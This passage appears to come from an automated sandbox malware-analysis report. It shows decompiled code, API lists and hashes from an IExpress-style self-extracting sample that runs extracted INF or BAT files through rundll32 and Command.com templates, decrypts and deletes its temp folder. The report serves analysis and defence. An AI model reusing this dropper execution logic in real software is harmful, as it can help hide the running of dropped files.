                                                                                                                                                                                                                                              				CHAR* _t60;
                                                                                                                                                                                                                                              				void* _t62;
                                                                                                                                                                                                                                              				signed char _t65;
                                                                                                                                                                                                                                              				intOrPtr _t76;
                                                                                                                                                                                                                                              				intOrPtr _t77;
                                                                                                                                                                                                                                              				unsigned int _t85;
                                                                                                                                                                                                                                              				CHAR* _t90;
                                                                                                                                                                                                                                              				CHAR* _t92;
                                                                                                                                                                                                                                              				char _t105;
                                                                                                                                                                                                                                              				char _t106;
                                                                                                                                                                                                                                              				CHAR** _t111;
                                                                                                                                                                                                                                              				CHAR* _t115;
                                                                                                                                                                                                                                              				intOrPtr* _t125;
                                                                                                                                                                                                                                              				void* _t126;
                                                                                                                                                                                                                                              				CHAR* _t132;
                                                                                                                                                                                                                                              				CHAR* _t135;
                                                                                                                                                                                                                                              				void* _t138;
                                                                                                                                                                                                                                              				void* _t139;
                                                                                                                                                                                                                                              				void* _t145;
                                                                                                                                                                                                                                              				intOrPtr* _t146;
                                                                                                                                                                                                                                              				char* _t148;
                                                                                                                                                                                                                                              				CHAR* _t151;
                                                                                                                                                                                                                                              				void* _t152;
                                                                                                                                                                                                                                              				CHAR* _t155;
                                                                                                                                                                                                                                              				CHAR* _t156;
                                                                                                                                                                                                                                              				void* _t157;
                                                                                                                                                                                                                                              				signed int _t158;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t48 =  *0x1a8004; // 0x56898003
                                                                                                                                                                                                                                              				_v8 = _t48 ^ _t158;
                                                                                                                                                                                                                                              				_t108 = __ecx;
                                                                                                                                                                                                                                              				_v1564 = _a4;
                                                                                                                                                                                                                                              				_v1560 = _a8;
                                                                                                                                                                                                                                              				E001A1680( &_v528, 0x104, __ecx);
                                                                                                                                                                                                                                              				if(_v528 != 0x22) {
                                                                                                                                                                                                                                              					_t135 = " ";
                                                                                                                                                                                                                                              					_t53 =  &_v528;
                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                              					_t135 = "\"";
                                                                                                                                                                                                                                              					_t53 =  &_v527;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_t111 =  &_v1556;
				_v1556 = _t53;
				_t54 = E001A1A84(_t111, _t135);
				_t156 = _v1556;
				_t151 = _t54;
				if(_t156 == 0) {
					L12:
					_push(_t111);
					E001A1781( &_v268, 0x104, _t111, "C:\Users\jones\AppData\Local\Temp\IXP001.TMP\");
					E001A658A( &_v268, 0x104, _t156);
					goto L13;
				} else {
					_t132 = _t156;
					_t148 =  &(_t132[1]);
					do {
						_t105 =  *_t132;
						_t132 =  &(_t132[1]);
					} while (_t105 != 0);
					_t111 = _t132 - _t148;
					if(_t111 < 3) {
						goto L12;
					}
					_t106 = _t156[1];
					if(_t106 != 0x3a || _t156[2] != 0x5c) {
						if( *_t156 != 0x5c || _t106 != 0x5c) {
							goto L12;
						} else {
							goto L11;
						}
					} else {
						L11:
						E001A1680( &_v268, 0x104, _t156);
						L13:
						_t138 = 0x2e;
						_t57 = E001A66C8(_t156, _t138);
						if(_t57 == 0 || CompareStringA(0x7f, 1, _t57, 0xffffffff, ".INF", 0xffffffff) != 0) {
							_t139 = 0x2e;
							_t115 = _t156;
							_t58 = E001A66C8(_t115, _t139);
							if(_t58 == 0 || CompareStringA(0x7f, 1, _t58, 0xffffffff, ".BAT", 0xffffffff) != 0) {
								_t156 = LocalAlloc(0x40, 0x400);
								if(_t156 == 0) {
									goto L43;
								}
								_t65 = GetFileAttributesA( &_v268); // executed
								if(_t65 == 0xffffffff || (_t65 & 0x00000010) != 0) {
									E001A1680( &_v1552, 0x400, _t108);
								} else {
									_push(_t115);
									_t108 = 0x400;
									E001A1781( &_v1552, 0x400, _t115,  &_v268);
									if(_t151 != 0 &&  *_t151 != 0) {
										E001A16B3( &_v1552, 0x400, " ");
										E001A16B3( &_v1552, 0x400, _t151);
									}
								}
								_t140 = _t156;
								 *_t156 = 0;
								E001A2AAC( &_v1552, _t156, _t156);
								goto L53;
							} else {
								_t108 = "Command.com /c %s";
								_t125 = "Command.com /c %s";
								_t145 = _t125 + 1;
								do {
									_t76 =  *_t125;
									_t125 = _t125 + 1;
								} while (_t76 != 0);
								_t126 = _t125 - _t145;
								_t146 =  &_v268;
								_t157 = _t146 + 1;
								do {
									_t77 =  *_t146;
									_t146 = _t146 + 1;
								} while (_t77 != 0);
								_t140 = _t146 - _t157;
								_t154 = _t126 + 8 + _t146 - _t157;
								_t156 = LocalAlloc(0x40, _t126 + 8 + _t146 - _t157);
								if(_t156 != 0) {
									E001A171E(_t156, _t154, "Command.com /c %s",  &_v268);
									goto L53;
								}
								goto L43;
							}
						} else {
							_t85 = GetFileAttributesA( &_v268);
							if(_t85 == 0xffffffff || ( !(_t85 >> 4) & 0x00000001) == 0) {
								_t140 = 0x525;
								_push(0);
								_push(0x10);
								_push(0);
								_t60 =  &_v268;
								goto L35;
							} else {
								_t140 = "[";
								_v1556 = _t151;
								_t90 = E001A1A84( &_v1556, "[");
								if(_t90 != 0) {
									if( *_t90 != 0) {
										_v1556 = _t90;
									}
									_t140 = "]";
									E001A1A84( &_v1556, "]");
								}
								_t156 = LocalAlloc(0x40, 0x200);
								if(_t156 == 0) {
									L43:
									_t60 = 0;
									_t140 = 0x4b5;
									_push(0);
									_push(0x10);
									_push(0);
									L35:
									_push(_t60);
									E001A44B9(0, _t140);
									_t62 = 0;
									goto L54;
								} else {
									_t155 = _v1556;
									_t92 = _t155;
									if( *_t155 == 0) {
										_t92 = "DefaultInstall";
									}
									 *0x1a9120 = GetPrivateProfileIntA(_t92, "Reboot", 0,  &_v268);
									 *_v1560 = 1;
									if(GetPrivateProfileStringA("Version", "AdvancedINF", 0x1a1140, _t156, 8,  &_v268) == 0) {
										 *0x1a9a34 =  *0x1a9a34 & 0xfffffffb;
										if( *0x1a9a40 != 0) {
											_t108 = "setupapi.dll";
										} else {
											_t108 = "setupx.dll";
											GetShortPathNameA( &_v268,  &_v268, 0x104);
										}
										if( *_t155 == 0) {
											_t155 = "DefaultInstall";
										}
										_push( &_v268);
										_push(_t155);
                                                                                                                                                                                                                                              										E001A171E(_t156, 0x200, "rundll32.exe %s,InstallHinfSection %s 128 %s", _t108);
                                                                                                                                                                                                                                              									} else {
                                                                                                                                                                                                                                              										 *0x1a9a34 =  *0x1a9a34 | 0x00000004;
                                                                                                                                                                                                                                              										if( *_t155 == 0) {
                                                                                                                                                                                                                                              											_t155 = "DefaultInstall";
                                                                                                                                                                                                                                              										}
                                                                                                                                                                                                                                              										E001A1680(_t108, 0x104, _t155);
                                                                                                                                                                                                                                              										_t140 = 0x200;
                                                                                                                                                                                                                                              										E001A1680(_t156, 0x200,  &_v268);
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              									L53:
                                                                                                                                                                                                                                              									_t62 = 1;
                                                                                                                                                                                                                                              									 *_v1564 = _t156;
                                                                                                                                                                                                                                              									L54:
                                                                                                                                                                                                                                              									_pop(_t152);
                                                                                                                                                                                                                                              									return E001A6CE0(_t62, _t108, _v8 ^ _t158, _t140, _t152, _t156);
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              			}














































                                                                                                                                                                                                                                              0x001a1c1b
                                                                                                                                                                                                                                              0x001a1c1b
                                                                                                                                                                                                                                              0x001a1c20
                                                                                                                                                                                                                                              0x001a1c2c
                                                                                                                                                                                                                                              0x001a1c33
                                                                                                                                                                                                                                              0x001a1c38
                                                                                                                                                                                                                                              0x001a1c3a
                                                                                                                                                                                                                                              0x001a1c3a
                                                                                                                                                                                                                                              0x001a1c40
                                                                                                                                                                                                                                              0x001a1c4b
                                                                                                                                                                                                                                              0x001a1c4b
                                                                                                                                                                                                                                              0x001a1c5d
                                                                                                                                                                                                                                              0x001a1c61
                                                                                                                                                                                                                                              0x001a1dd4
                                                                                                                                                                                                                                              0x001a1dd4
                                                                                                                                                                                                                                              0x001a1dd6
                                                                                                                                                                                                                                              0x001a1ddb
                                                                                                                                                                                                                                              0x001a1ddc
                                                                                                                                                                                                                                              0x001a1dde
                                                                                                                                                                                                                                              0x001a1d64
                                                                                                                                                                                                                                              0x001a1d64
                                                                                                                                                                                                                                              0x001a1d67
                                                                                                                                                                                                                                              0x001a1d6c
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a1c67
                                                                                                                                                                                                                                              0x001a1c67
                                                                                                                                                                                                                                              0x001a1c6d
                                                                                                                                                                                                                                              0x001a1c72
                                                                                                                                                                                                                                              0x001a1c74
                                                                                                                                                                                                                                              0x001a1c74
                                                                                                                                                                                                                                              0x001a1c8e
                                                                                                                                                                                                                                              0x001a1c99
                                                                                                                                                                                                                                              0x001a1cc0
                                                                                                                                                                                                                                              0x001a1cf8
                                                                                                                                                                                                                                              0x001a1d07
                                                                                                                                                                                                                                              0x001a1d23
                                                                                                                                                                                                                                              0x001a1d09
                                                                                                                                                                                                                                              0x001a1d14
                                                                                                                                                                                                                                              0x001a1d1b
                                                                                                                                                                                                                                              0x001a1d1b
                                                                                                                                                                                                                                              0x001a1d2b
                                                                                                                                                                                                                                              0x001a1d2d
                                                                                                                                                                                                                                              0x001a1d2d
                                                                                                                                                                                                                                              0x001a1d38
                                                                                                                                                                                                                                              0x001a1d39
                                                                                                                                                                                                                                              0x001a1d46
                                                                                                                                                                                                                                              0x001a1cc2
                                                                                                                                                                                                                                              0x001a1cc2
                                                                                                                                                                                                                                              0x001a1ccc
                                                                                                                                                                                                                                              0x001a1cce
                                                                                                                                                                                                                                              0x001a1cce
                                                                                                                                                                                                                                              0x001a1cdb
                                                                                                                                                                                                                                              0x001a1ce6
                                                                                                                                                                                                                                              0x001a1cee
                                                                                                                                                                                                                                              0x001a1cee
                                                                                                                                                                                                                                              0x001a1e89
                                                                                                                                                                                                                                              0x001a1e91
                                                                                                                                                                                                                                              0x001a1e92
                                                                                                                                                                                                                                              0x001a1e94
                                                                                                                                                                                                                                              0x001a1e97
                                                                                                                                                                                                                                              0x001a1ea4
                                                                                                                                                                                                                                              0x001a1ea4
                                                                                                                                                                                                                                              0x001a1c61
                                                                                                                                                                                                                                              0x001a1c07
                                                                                                                                                                                                                                              0x001a1bd3
                                                                                                                                                                                                                                              0x001a1b7b

APIs
• CompareStringA.KERNEL32(0000007F,00000001,00000000,000000FF,.INF,000000FF,?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,?,00000000,00000001,00000000), ref: 001A1BE7
• GetFileAttributesA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,?,00000000,00000001,00000000), ref: 001A1BFE
• LocalAlloc.KERNEL32(00000040,00000200,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,?,00000000,00000001,00000000), ref: 001A1C57
• GetPrivateProfileIntA.KERNEL32 ref: 001A1C88
• GetPrivateProfileStringA.KERNEL32(Version,AdvancedINF,001A1140,00000000,00000008,?), ref: 001A1CB8
• GetShortPathNameA.KERNEL32 ref: 001A1D1B
  • Part of subcall function 001A44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 001A4518
  • Part of subcall function 001A44B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 001A4554
Strings
Memory Dump Source
• Source File: 00000001.00000002.411425233.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
• Associated: 00000001.00000002.411409282.00000000001A0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.411438065.00000000001A8000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.411446863.00000000001AA000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.411446863.00000000001AC000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_1a0000_fuN31PL.jbxd
Similarity
• API ID: String$PrivateProfile$AllocAttributesCompareFileLoadLocalMessageNamePathShort
• String ID: "$.BAT$.INF$AdvancedINF$C:\Users\user\AppData\Local\Temp\IXP001.TMP\$Command.com /c %s$DefaultInstall$Reboot$Version$rundll32.exe %s,InstallHinfSection %s 128 %s$setupapi.dll$setupx.dll
• API String ID: 383838535-819679500
• Opcode ID: bffaa85e425f9b760fdac4b6824b20b973b255010ab221045e9b5a9a429ad3a5
• Instruction ID: d60c6aae992e0ea8bcec037994cdd7280bb5684b708fa89840b40195f6ec7e10
• Opcode Fuzzy Hash: bffaa85e425f9b760fdac4b6824b20b973b255010ab221045e9b5a9a429ad3a5
• Instruction Fuzzy Hash: 0DA108BCA002187BEB219B34CC45BEA7769AF57310F144295F995E32D1DBB09EC6CB50
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

                                                                                                                                                                                                                                              control_flow_graph 450 1a2f1d-1a2f3d 451 1a2f3f-1a2f46 450->451 452 1a2f6c-1a2f73 call 1a5164 450->452 453 1a2f48 call 1a51e5 451->453 454 1a2f5f-1a2f66 call 1a3a3f 451->454 459 1a2f79-1a2f80 call 1a55a0 452->459 460 1a3041 452->460 461 1a2f4d-1a2f4f 453->461 454->452 454->460 459->460 468 1a2f86-1a2fbe GetSystemDirectoryA call 1a658a LoadLibraryA 459->468 464 1a3043-1a3053 call 1a6ce0 460->464 461->460 465 1a2f55-1a2f5d 461->465 465->452 465->454 472 1a2fc0-1a2fd4 GetProcAddress 468->472 473 1a2ff7-1a3004 FreeLibrary 468->473 472->473 474 1a2fd6-1a2fee DecryptFileA 472->474 475 1a3006-1a300c 473->475 476 1a3017-1a3024 SetCurrentDirectoryA 473->476 474->473 489 1a2ff0-1a2ff5 474->489 475->476 479 1a300e call 1a621e 475->479 477 1a3026-1a303c call 1a44b9 call 1a6285 476->477 478 1a3054-1a305a 476->478 477->460 482 1a305c call 1a3b26 478->482 483 1a3065-1a306c 478->483 487 1a3013-1a3015 479->487 495 1a3061-1a3063 482->495 485 1a306e-1a3075 call 1a256d 483->485 486 1a307c-1a3089 483->486 496 1a307a 485->496 492 1a308b-1a3091 486->492 493 1a30a1-1a30a9 486->493 487->460 487->476 489->473 492->493 497 1a3093 call 1a3ba2 492->497 499 1a30ab-1a30ad 493->499 500 1a30b4-1a30b7 493->500 495->460 495->483 496->486 503 1a3098-1a309a 497->503 499->500 502 1a30af call 1a4169 499->502 500->464 502->500 503->460 505 1a309c 503->505 505->493
C-Code - Quality: 82%
E001A2F1D(void* __ecx, int __edx) {
	signed int _v8;
	char _v272;
	_Unknown_base(*)()* _v276;
	void* __ebx;
	void* __edi;
	void* __esi;
	signed int _t9;
	void* _t11;
	struct HWND__* _t12;
	void* _t14;
	int _t21;
	signed int _t22;
	signed int _t25;
	intOrPtr* _t26;
	signed int _t27;
	void* _t30;
	_Unknown_base(*)()* _t31;
	void* _t34;
	struct HINSTANCE__* _t36;
	intOrPtr _t41;
	intOrPtr* _t44;
	signed int _t46;
	int _t47;
	void* _t58;
	void* _t59;

	_t43 = __edx;
	_t9 =  *0x1a8004; // 0x56898003
	_v8 = _t9 ^ _t46;
	if( *0x1a8a38 != 0) {
		L5:
		_t11 = E001A5164(_t52);
		_t53 = _t11;
		if(_t11 == 0) {
			L16:
			_t12 = 0;
			L17:
			return E001A6CE0(_t12, _t36, _v8 ^ _t46, _t43, _t44, _t45);
		}
		_t14 = E001A55A0(_t53); // executed
		if(_t14 == 0) {
			goto L16;
		} else {
			_t45 = 0x105;
			GetSystemDirectoryA( &_v272, 0x105);
			_t43 = 0x105;
			_t40 =  &_v272;
			E001A658A( &_v272, 0x105, "advapi32.dll");
			_t36 = LoadLibraryA( &_v272);
			_t44 = 0;
			if(_t36 != 0) {
				_t31 = GetProcAddress(_t36, "DecryptFileA");
				_v276 = _t31;
				if(_t31 != 0) {
					_t45 = _t47;
					_t40 = _t31;
					 *0x1aa288("C:\Users\jones\AppData\Local\Temp\IXP001.TMP\", 0); // executed
					_v276();
					if(_t47 != _t47) {
						_t40 = 4;
						asm("int 0x29");
					}
				}
			}
			FreeLibrary(_t36);
			_t58 =  *0x1a8a24 - _t44; // 0x0
			if(_t58 != 0) {
				L14:
				_t21 = SetCurrentDirectoryA("C:\Users\jones\AppData\Local\Temp\IXP001.TMP\"); // executed
				if(_t21 != 0) {
					__eflags =  *0x1a8a2c - _t44; // 0x0
					if(__eflags != 0) {
						L20:
						__eflags =  *0x1a8d48 & 0x000000c0;
						if(( *0x1a8d48 & 0x000000c0) == 0) {
							_t41 =  *0x1a9a40; // 0x3, executed
							_t26 = E001A256D(_t41); // executed
							_t44 = _t26;
						}
						_t22 =  *0x1a8a24; // 0x0
						 *0x1a9a44 = _t44;
						__eflags = _t22;
						if(_t22 != 0) {
							L26:
							__eflags =  *0x1a8a38;
							if( *0x1a8a38 == 0) {
								__eflags = _t22;
								if(__eflags == 0) {
									E001A4169(__eflags);
								}
							}
							_t12 = 1;
							goto L17;
						} else {
							__eflags =  *0x1a9a30 - _t22; // 0x0
							if(__eflags != 0) {
								goto L26;
							}
							_t25 = E001A3BA2(); // executed
							__eflags = _t25;
							if(_t25 == 0) {
								goto L16;
							}
							_t22 =  *0x1a8a24; // 0x0
							goto L26;
						}
					}
					_t27 = E001A3B26(_t40, _t44);
					__eflags = _t27;
					if(_t27 == 0) {
						goto L16;
					}
					goto L20;
				}
				_t43 = 0x4bc;
				E001A44B9(0, 0x4bc, _t44, _t44, 0x10, _t44);
				 *0x1a9124 = E001A6285();
				goto L16;
			}
			_t59 =  *0x1a9a30 - _t44; // 0x0
			if(_t59 != 0) {
				goto L14;
			}
			_t30 = E001A621E(); // executed
			if(_t30 == 0) {
				goto L16;
			}
			goto L14;
		}
	}
	_t49 =  *0x1a8a24;
	if( *0x1a8a24 != 0) {
		L4:
		_t34 = E001A3A3F(_t51);
		_t52 = _t34;
		if(_t34 == 0) {
                                                                                                                                                                                                                                              						goto L16;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					goto L5;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				if(E001A51E5(_t49) == 0) {
                                                                                                                                                                                                                                              					goto L16;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_t51 =  *0x1a8a38;
                                                                                                                                                                                                                                              				if( *0x1a8a38 != 0) {
                                                                                                                                                                                                                                              					goto L5;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				goto L4;
                                                                                                                                                                                                                                              			}




























                                                                                                                                                                                                                                              0x001a2f55
                                                                                                                                                                                                                                              0x001a2f5d
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetSystemDirectoryA.KERNEL32 ref: 001A2F93
                                                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(?,advapi32.dll), ref: 001A2FB2
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,DecryptFileA), ref: 001A2FC6
                                                                                                                                                                                                                                              • DecryptFileA.ADVAPI32 ref: 001A2FE6
                                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000), ref: 001A2FF8
                                                                                                                                                                                                                                              • SetCurrentDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 001A301C
                                                                                                                                                                                                                                                • Part of subcall function 001A51E5: LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,001A2F4D,?,00000002,00000000), ref: 001A5201
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.411425233.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411409282.00000000001A0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411438065.00000000001A8000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_1a0000_fuN31PL.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: DirectoryLibrary$AddressAllocCurrentDecryptFileFreeLoadLocalProcSystem
                                                                                                                                                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$DecryptFileA$advapi32.dll
                                                                                                                                                                                                                                              • API String ID: 2126469477-3023407756
                                                                                                                                                                                                                                              • Opcode ID: cb39f72d78d19587f516e1119313531ebf6097b0f825c9861624a9175a6c1b62
                                                                                                                                                                                                                                              • Instruction ID: 7a6eae43469c0712b0147ed163c9cec49836b762845f0330938a1e7eba35e1dc
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cb39f72d78d19587f516e1119313531ebf6097b0f825c9861624a9175a6c1b62
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BD41D53DA002159FDB30AB75AE45B6A37A9EF67750F000166F951C3992EF74CEC0CA61
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              C-Code - Quality: 86%
                                                                                                                                                                                                                                              			E001A2390(CHAR* __ecx) {
                                                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                                                              				char _v276;
                                                                                                                                                                                                                                              				char _v280;
                                                                                                                                                                                                                                              				char _v284;
                                                                                                                                                                                                                                              				struct _WIN32_FIND_DATAA _v596;
                                                                                                                                                                                                                                              				struct _WIN32_FIND_DATAA _v604;
                                                                                                                                                                                                                                              				void* __ebx;
                                                                                                                                                                                                                                              				void* __edi;
                                                                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                                                                              				signed int _t21;
                                                                                                                                                                                                                                              				int _t36;
                                                                                                                                                                                                                                              				void* _t46;
                                                                                                                                                                                                                                              				void* _t62;
                                                                                                                                                                                                                                              				void* _t63;
                                                                                                                                                                                                                                              				CHAR* _t65;
                                                                                                                                                                                                                                              				void* _t66;
                                                                                                                                                                                                                                              				signed int _t67;
                                                                                                                                                                                                                                              				signed int _t69;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t69 = (_t67 & 0xfffffff8) - 0x254;
                                                                                                                                                                                                                                              				_t21 =  *0x1a8004; // 0x56898003
                                                                                                                                                                                                                                              				_t22 = _t21 ^ _t69;
                                                                                                                                                                                                                                              				_v8 = _t21 ^ _t69;
                                                                                                                                                                                                                                              				_t65 = __ecx;
                                                                                                                                                                                                                                              				if(__ecx == 0 ||  *((char*)(__ecx)) == 0) {
                                                                                                                                                                                                                                              					L10:
                                                                                                                                                                                                                                              					_pop(_t62);
                                                                                                                                                                                                                                              					_pop(_t66);
                                                                                                                                                                                                                                              					_pop(_t46);
                                                                                                                                                                                                                                              					return E001A6CE0(_t22, _t46, _v8 ^ _t69, _t58, _t62, _t66);
                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                              					E001A1680( &_v276, 0x104, __ecx);
                                                                                                                                                                                                                                              					_t58 = 0x104;
                                                                                                                                                                                                                                              					E001A16B3( &_v280, 0x104, "*");
                                                                                                                                                                                                                                              					_t22 = FindFirstFileA( &_v284,  &_v604); // executed
                                                                                                                                                                                                                                              					_t63 = _t22;
                                                                                                                                                                                                                                              					if(_t63 == 0xffffffff) {
                                                                                                                                                                                                                                              						goto L10;
                                                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                                                              						goto L3;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					do {
                                                                                                                                                                                                                                              						L3:
                                                                                                                                                                                                                                              						_t58 = 0x104;
                                                                                                                                                                                                                                              						E001A1680( &_v276, 0x104, _t65);
                                                                                                                                                                                                                                              						if((_v604.ftCreationTime & 0x00000010) == 0) {
                                                                                                                                                                                                                                              							_t58 = 0x104;
                                                                                                                                                                                                                                              							E001A16B3( &_v276, 0x104,  &(_v596.dwReserved1));
                                                                                                                                                                                                                                              							SetFileAttributesA( &_v280, 0x80);
                                                                                                                                                                                                                                              							DeleteFileA( &_v280);
                                                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                                                              							if(lstrcmpA( &(_v596.dwReserved1), ".") != 0 && lstrcmpA( &(_v596.cFileName), "..") != 0) {
                                                                                                                                                                                                                                              								E001A16B3( &_v276, 0x104,  &(_v596.cFileName));
                                                                                                                                                                                                                                              								_t58 = 0x104;
                                                                                                                                                                                                                                              								E001A658A( &_v280, 0x104, 0x1a1140);
                                                                                                                                                                                                                                              								E001A2390( &_v284);
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_t36 = FindNextFileA(_t63,  &_v596); // executed
                                                                                                                                                                                                                                              					} while (_t36 != 0);
                                                                                                                                                                                                                                              					FindClose(_t63); // executed
                                                                                                                                                                                                                                              					_t22 = RemoveDirectoryA(_t65); // executed
                                                                                                                                                                                                                                              					goto L10;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              			}





















                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a2407
                                                                                                                                                                                                                                              0x001a2407
                                                                                                                                                                                                                                              0x001a2408
                                                                                                                                                                                                                                              0x001a2411
                                                                                                                                                                                                                                              0x001a241f
                                                                                                                                                                                                                                              0x001a247a
                                                                                                                                                                                                                                              0x001a2483
                                                                                                                                                                                                                                              0x001a2495
                                                                                                                                                                                                                                              0x001a24a3
                                                                                                                                                                                                                                              0x001a2421
                                                                                                                                                                                                                                              0x001a242f
                                                                                                                                                                                                                                              0x001a2453
                                                                                                                                                                                                                                              0x001a245d
                                                                                                                                                                                                                                              0x001a2466
                                                                                                                                                                                                                                              0x001a2472
                                                                                                                                                                                                                                              0x001a2472
                                                                                                                                                                                                                                              0x001a242f
                                                                                                                                                                                                                                              0x001a24af
                                                                                                                                                                                                                                              0x001a24b5
                                                                                                                                                                                                                                              0x001a24be
                                                                                                                                                                                                                                              0x001a24c5
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a24c5

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • FindFirstFileA.KERNELBASE(?,001A8A3A,001A11F4,001A8A3A,00000000,?,?), ref: 001A23F6
                                                                                                                                                                                                                                              • lstrcmpA.KERNEL32(?,001A11F8), ref: 001A2427
                                                                                                                                                                                                                                              • lstrcmpA.KERNEL32(?,001A11FC), ref: 001A243B
                                                                                                                                                                                                                                              • SetFileAttributesA.KERNEL32(?,00000080,?), ref: 001A2495
                                                                                                                                                                                                                                              • DeleteFileA.KERNEL32(?), ref: 001A24A3
                                                                                                                                                                                                                                              • FindNextFileA.KERNELBASE(00000000,00000010), ref: 001A24AF
                                                                                                                                                                                                                                              • FindClose.KERNELBASE(00000000), ref: 001A24BE
                                                                                                                                                                                                                                              • RemoveDirectoryA.KERNELBASE(001A8A3A), ref: 001A24C5
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.411425233.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411409282.00000000001A0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411438065.00000000001A8000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_1a0000_fuN31PL.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: File$Find$lstrcmp$AttributesCloseDeleteDirectoryFirstNextRemove
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 836429354-0
                                                                                                                                                                                                                                              • Opcode ID: c01f09d6b59f4a0a46c0b64e7c648abff15ba98d75e3776a936a2c0b4ad33118
                                                                                                                                                                                                                                              • Instruction ID: e54a5aaba29082953ff6bfe68a0ef9c56a922dbec9335e562fab50b795568f54
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c01f09d6b59f4a0a46c0b64e7c648abff15ba98d75e3776a936a2c0b4ad33118
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6531B535604740ABC321DB68CD89AEB73ECAFDB315F04492DF559C2190EB74994DC752
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 70%
                                                                                                                                                                                                                                              			E001A2BFB(struct HINSTANCE__* _a4, intOrPtr _a12) {
                                                                                                                                                                                                                                              				void* __ebx;
                                                                                                                                                                                                                                              				void* __edi;
                                                                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                                                                              				void* __ebp;
                                                                                                                                                                                                                                              				long _t4;
                                                                                                                                                                                                                                              				void* _t6;
                                                                                                                                                                                                                                              				intOrPtr _t7;
                                                                                                                                                                                                                                              				void* _t9;
                                                                                                                                                                                                                                              				struct HINSTANCE__* _t12;
